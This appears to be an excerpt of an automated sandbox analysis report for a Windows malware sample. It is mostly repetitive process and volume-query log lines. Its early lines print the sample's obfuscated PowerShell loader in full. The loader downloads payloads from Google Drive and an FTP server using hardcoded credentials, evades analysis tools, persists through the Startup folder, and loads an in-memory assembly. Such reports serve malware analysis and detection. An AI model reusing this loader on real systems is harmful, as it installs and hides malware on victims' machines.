Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $jphaa = 'ja' + [char]66 + '2ahgayg' + [char]66 + 'dahgaiaa9acaaja' + [char]66 + 'oag8acw' + [char]66 + '0ac4avg' + [char]66 + 'lahiacw' + [char]66 + 'pag8abgauae0ayq' + [char]66 + 'qag8acgauaeuacq' + [char]66 + '1ageaba' + [char]66 + 'zacgamgapadsasq' + [char]66 + 'macaakaagacqadg' + [char]66 + '4agiaqw' + [char]66 + '4acaakqagahsaja' + [char]66 + 'iahoatw' + [char]66 + 'nagoaiaa9acaaww' + [char]66 + 'tahkacw' + [char]66 + '0aguabqauaekatwauafaayq' + [char]66 + '0aggaxqa6adoarw' + [char]66 + 'lahqava' + [char]66 + 'lag0aca' + [char]66 + 'qageada' + [char]66 + 'oacgakqa7agqazq' + [char]66 + 'sacaakaakaegaeg' + [char]66 + 'pae0aagagacsaiaanafwavq' + [char]66 + 'wahcaaq' + [char]66 + 'uac4abq' + [char]66 + 'zahuajwapadsaja' + [char]66 + 'qagsadw' + [char]66 + 'qahoaiaa9acaajw' + [char]66 + 'oahqada' + [char]66 + 'wahmaogavac8aza' + [char]66 + 'yagkadg' + [char]66 + 'lac4azw' + [char]66 + 'vag8azw' + [char]66 + 'sagualg' + [char]66 + 'jag8abqavahuaywa/aguaea' + [char]66 + 'wag8acg' + [char]66 + '0ad0aza' + [char]66 + 'vahcabg' + [char]66 + 'sag8ayq' + [char]66 + 'kacyaaq' + [char]66 + 'kad0ajwa7acqaua' + [char]66 + 'pafuauq' + [char]66 + 'iacaapqagacqazq' + [char]66 + 'uahyaog' + [char]66 + 'qafiatw' + [char]66 + 'daeuauw' + [char]66 + 'tae8aug' + [char]66 + 'faeeaug' + [char]66 + 'daegasq' + [char]66 + 'uaeuaqw' + [char]66 + 'uafuaug' + [char]66 + 'fac4aqw' + [char]66 + 'vag4ada' + [char]66 + 'hagkabg' + [char]66 + 'zacgajwa2adqajwapadsaaq' + [char]66 + 'macaakaagacqaua' + [char]66 + 'pafuauq' + [char]66 + 'iacaakqagahsaja' + [char]66 + 'qagsadw' + [char]66 + 'qahoaiaa9acaakaakagoaaw' + [char]66 + '3agoaegagacsaiaanadeacaayagiacg' + [char]66 + 'qaegalq' + [char]66 + 'rae4awqa1agiacg' + [char]66 + '3agkata' + [char]66 + 'aahuawq' + [char]66 + 'zafcalq' + [char]66 + 'saduaoq' + [char]66 + 'vahcaag' + [char]66 + 'kafmarq' + [char]66 + 'waccakqagadsafq' + [char]66 + 'lagwacw' + [char]66 + 'lacaaewakagoaaw' + [char]66 + '3agoaegagad0aiaaoacqaag' + [char]66 + 'rahcaag' + [char]66 + '6acaakwagaccamq' + [char]66 + 'hageasa' + [char]66 + '5adqalq' + [char]66 + 'caewamq' + [char]66 + 'qahaaqq' + [char]66 + 'uagoaaa' + [char]66 + '0aguazwa4adgasw' + [char]66 + 'nafoanw' + [char]66 + 'jahuaoaaxafoamaa1ahcajwapacaaow' + [char]66 + '9adsaja' + [char]66 + 'jahgaca' + [char]66 + 'magqaiaa9acaakaagae4azq' + [char]66 + '3ac0atw' + [char]66 + 'iagoazq' + [char]66 + 'jahqaia' + [char]66 + 'oaguadaauafcazq' + [char]66 + 'iaemaba' + [char]66 + 'paguabg' + [char]66 + '0acaakqagadsaja' + [char]66 + 'jahgaca' + [char]66 + 'magqalg' + [char]66 + 'fag4ayw' + [char]66 + 'vagqaaq' + [char]66 + 'uagcaiaa9acaaww' + [char]66 + 'tahkacw' + [char]66 + '0aguabqauafqazq' + [char]66 + '4ahqalg' + [char]66 + 'fag4ayw' + [char]66 + 'vagqaaq' + [char]66 + 'uagcaxqa6adoavq' + [char]66 + 'uaeyaoaagadsaja' + [char]66 + 'jahgaca' + [char]66 + 'magqalg' + [char]66 +	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$vxbcx = $host.version.major.equals(2);if ( $vxbcx ) {$hzomj = [system.io.path]::gettemppath();del ($hzomj + '\upwin.msu');$jkwjz = 'https://drive.google.com/uc?export=download&id=';$piuqb = $env:processor_architecture.contains('64');if ( $piuqb ) {$jkwjz = ($jkwjz + '1p2brjh-qny5brwilzuysw-r59uwjdsev') ;}else {$jkwjz = ($jkwjz + '1aahy4-bl1jpanjhteg88kmz7cu81z05w') ;};$cxpfd = ( new-object net.webclient ) ;$cxpfd.encoding = [system.text.encoding]::utf8 ;$cxpfd.downloadfile($jkwjz, ($hzomj + '\upwin.msu') ) ;$tpwkf = ( 'c:\users\' + [environment]::username );hhxhb = ( $hzomj + '\upwin.msu' ) ; powershell.exe wusa.exe hhxhb /quiet /norestart ; copy-item 'c:\users\user\desktop\devis_valide.js' -destination ( $tpwkf + '\appdata\roaming\microsoft\windows\start menu\programs\startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[system.net.servicepointmanager]::servercertificatevalidationcallback = {$true} ;[system.net.servicepointmanager]::securityprotocol = [system.net.securityprotocoltype]::tls12 ;if((get-process 'wireshark','apatedns','analyze' -ea silentlycontinue) -eq $null){ } else{ restart-computer -force ; exit ; } ;$jlcqj = ('ftp://desckvbrat1@ftp.desckvbrat.com.br/upcrypter' + '/02/dll01.txt' );$iepgq = ( [system.io.path]::gettemppath() + 'dll01.txt');$ojrrp = (-join [char[]](100,101,115,99,107,118,98,114,97,116,49)) ;$lllgq = (-join [char[]](102, 89, 117, 100, 89, 49, 53, 55, 56, 64, 64, 64, 64, 64, 64 )) ;$webclient = new-object system.net.webclient ;$webclient.credentials = new-object system.net.networkcredential($ojrrp, $lllgq) ;$rvuxv = $webclient.downloadstring( $jlcqj ) ;$rvuxv \| out-file -filepath $iepgq -encoding 'utf8' -force ;$stfgl = ( [system.io.path]::gettemppath() + 'dll02.txt') ;$phrln = new-object system.net.webclient ;$phrln.encoding = [system.text.encoding]::utf8 ;$dhzua = ( get-content -path $iepgq ) ;$utlhz = $phrln.downloadstring( $dhzua ) ;$utlhz \| out-file -filepath $stfgl -force ;$modrg = '$ryaeg = (get-content -path ' + $stfgl + ' -encoding utf8);' ;$modrg += '[byte[]] $fyfdz = [system.convert]::frombase64string( $ryaeg.replace(''?:?'',''a'') ) ;' ;$modrg += '[system.appdomain]::currentdomain.load( $fyfdz ).' ;$modrg += 'gettype( ''classlibrary3.class1'' ).getm' ;$modrg += 'ethod( ''prfvi'' ).invoke( $null , [object[]] ( ''k7nnmcpc/war/moc.nibetsap//:sptth'' , ''c:\users\user\desktop\devis_valide.js'' , ''d ddregasm'' ) );';$vbwwz = ( [system.io.path]::gettemppath() + 'dll03.ps1') ;$modrg \| out-file -filepath $vbwwz -force ;powershell -executionpolicy bypass -file $vbwwz ;};"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c "powershell.exe -windowstyle hidden start-sleep -seconds 1 ; powershell.exe -windowstyle hidden -executionpolicy bypass -file 'c:\users\user\appdata\locallow\daft sytem\program rules nvideo\program rules nvideo\program rules nvideo\program rules nvideo\iyvmd.ps1'"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c "powershell.exe -windowstyle hidden start-sleep -seconds 1 ; powershell.exe -windowstyle hidden -executionpolicy bypass -file 'c:\users\user\appdata\locallow\daft sytem\program rules nvideo\program rules nvideo\program rules nvideo\program rules nvideo\ainzw.ps1'"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden start-sleep -seconds 1 ; powershell.exe -windowstyle hidden -executionpolicy bypass -file 'c:\users\user\appdata\locallow\daft sytem\program rules nvideo\program rules nvideo\program rules nvideo\program rules nvideo\iyvmd.ps1'	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden start-sleep -seconds 1 ; powershell.exe -windowstyle hidden -executionpolicy bypass -file 'c:\users\user\appdata\locallow\daft sytem\program rules nvideo\program rules nvideo\program rules nvideo\program rules nvideo\ainzw.ps1'	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
